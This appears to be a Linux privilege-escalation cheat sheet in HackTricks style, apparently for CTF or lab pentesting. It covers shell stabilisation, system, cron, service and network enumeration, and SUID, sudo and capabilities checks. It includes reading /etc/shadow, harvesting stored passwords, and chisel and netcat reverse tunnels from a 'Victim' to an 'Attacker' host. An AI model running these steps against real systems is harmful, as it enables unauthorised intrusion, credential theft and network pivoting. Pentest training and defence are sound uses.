Shell Stabilization
python -c 'import pty;pty.spawn("/bin/bash")' OR
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ;
reset
stty columns 200 rows 200
System Information[1]
* Get OS information # uname -a
* Check the PATH for any writable folders # find . -writable
* Check the env variables for any sensitive details # env
* Search for Kernel Exploits (i.e. PwnKit, DirtyCow etc) # linpeas
* Check the sudo version to see if it's vulnerable # sudo sudo -V
# Version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
# Kernel Version
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz
# System enumeration Commands
ls /etc/*-release # -> looks for version numbers
cat /etc/os-release # -> cat out the file with the version numbers
hostname # -> return hostname of target
cat /etc/passwd # -> read passwd file for possible users
cat /etc/group # -> read groups for possible users
sudo cat /etc/shadow # -> read out shadow file for password hashes
ls -lh /var/mail # -> checks mail directories
ls /usr/bin/ & /sbin # -> for applications
rpm -qa # -> list installed packages on RPM linux distro
dpkg -l # -> list installed packages on Debian linux distro
who # -> shows logged in users
whoami # -> shows what user you are logged in as
w # -> shows who is logged in and what they are doing
id # -> gives you your current UID and Group
last # -> displays login and logout info for users
sudo -l # -> what commands we can run sudo as
Enumeration Tools:
Drives
* List mounted drives
* Any unmounted drives
* Any credentials in fstab
Installed Software
* Check for useful software installed
* Check for vulnerable software installed
dpkg -l # List all programs installed
dpkg -l | grep "program" # Search for a specific program
rpm -qa | grep "program" # Search for a specific program
Processes
* Is any unknown software running
* Is any software running with more privileges than it should have
* Can you modify the binary of any running process
* Monitor processes and check if any interesting process is running frequently
* Can you read some interesting process memory
# Commands
ps aux # Lists all the processes currently running on the machine
ps aux | grep "root" # Shows all process that belong to root
ps axjf #Lists all the processes in a tree format
ps
-e -> all processes
-f -> full-format listing
-j -> jobs format
-l -> long format
-u -> user-oriented format
pspy can also be uploaded and ran to see if there are any repeating processes
Process Tools:
Scheduled Task/Cron Jobs
* Is the PATH being modified by some cron job and you can write to it
* Any wildcard in a cron job
* Some modifiable script is being executed or is inside a modifiable folder
* A script that is being executed very frequently
#Commands
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Services
* Any writeable .service file
* Any writeable binary executed by a service
* Any writeable folder in systemd PATH
* Is There any wrong allocations
#Commands
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/
Environment Variables
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Timers
* Any writeable timers
Sockets
* Any writeable .socket file
* Can you communicate with any socket
* HTTP sockets with interesting info
D-BUS
* Can you communicate with any D-Bus
#Commands
dbus-monitor
Network
* Enumerate the network to know where you are
* Open ports you couldn't access before getting a shell inside the machine
* Can you sniff traffic using tcpdump
ip a s # -> shows current ip
cat /etc/resolv.conf # -> shows the DNS servers
netstat #-> shows info about network connections
-a #-> show both listening and non-listening sockets
-l #-> show only listening sockets
-n #-> show numeric output instead of resolving the IP address and port number
-t #-> TCP
-u #-> UDP
-x #-> UNIX
-p #-> show the PID and name of the program to which the socket belongs
sudo netstat -atupn #-> show all TCP / UDP listening and established conn with ports
sudo lsof -i #-> List of open files
sudo lsof - :port number #-> Checks for open files on a specific port
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
lastlog
Users
* Generic users/groups enumeration
* Do you have a very big UID? Is the machine vulnerable?
* Can you escalate privileges thanks to a group you belong to?
* Clipboard data?
* Password Policy?
* Try to use every known password that you have discovered previously to login with each possible user. Try to login also without a password.
Writeable Path
* If you have write privileges over some folder in PATH you may be able to escalate privileges
Sudo and SUID Commands
* Can you execute any command with sudo? Can you use it to READ, WRITE or EXECUTE anything as root? (GTFOBins)
* Is any exploitable SUID binary? (GTFOBins)
* Are sudo commands limited by path? can you bypass the restrictions?
* Sudo/SUID binary without path indicated?
* SUID binary specifying path? Bypass
* LD_PRELOAD vuln
* Lack of .so library in SUID binary from a writable folder?
* SUDO tokens available? Can you create a SUDO token?
* Can you read or modify sudoers files?
* Can you modify /etc/ld.so.conf.d/?
* OpenBSD DOAS command
# commands
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -name user.txt 2>/dev/null
find / -perm -u=s -type f 2>/dev/null | xarg ls -la
find / -user root -perm /4000 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid
getcap -r / 2>/dev/null
SUID Tools:[3]
Capabilities
* Has any binary unexpected capability
# Commands
getcap -r / 2>/dev/null # -> get capapbilities
ACL's
* Does any file have unexpected ACL
Open Shell Sessions
* Screen
* Tmux
SSH
* Debian OpenSSL Predictable PRNG - CVE-2008-0166
* SSH Interesting configuration values
# Port Forwarding
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
# Socks
./chisel server -p 8080 --reverse #Server -- Attacker
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
#And now you can use proxychains with port 1080 (default)
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v 10.10.10.10:8080 socks #Attacker
#Rpivot
Port Forwarding
FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc
localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Interesting Files
* Profile files - Read sensitive data? Write to privesc?
* passwd/shadow files - Read sensitive data? Write to privesc?
* Check commonly interesting folders for sensitive data
* Weird Location/Owned files, you may have access to or alter executable files
* Modified in last mins
* Sqlite DB files
* Hidden files
* Script/Binaries in PATH
* Web files (passwords?)
* Backups?
* Known files that contains passwords: Use Linpeas and LaZagne
* Generic search
Writeable Files
* Modify python library to execute arbitrary commands?
* Can you modify log files? Logtotten exploit
* Can you modify /etc/sysconfig/network-scripts/? Centos/Redhat exploit
* Can you write in ini, int.d, systemd or rc.d files?
Other Tricks
* Can you abuse NFS to escalate privileges?
* Do you need to escape from a restrictive shell?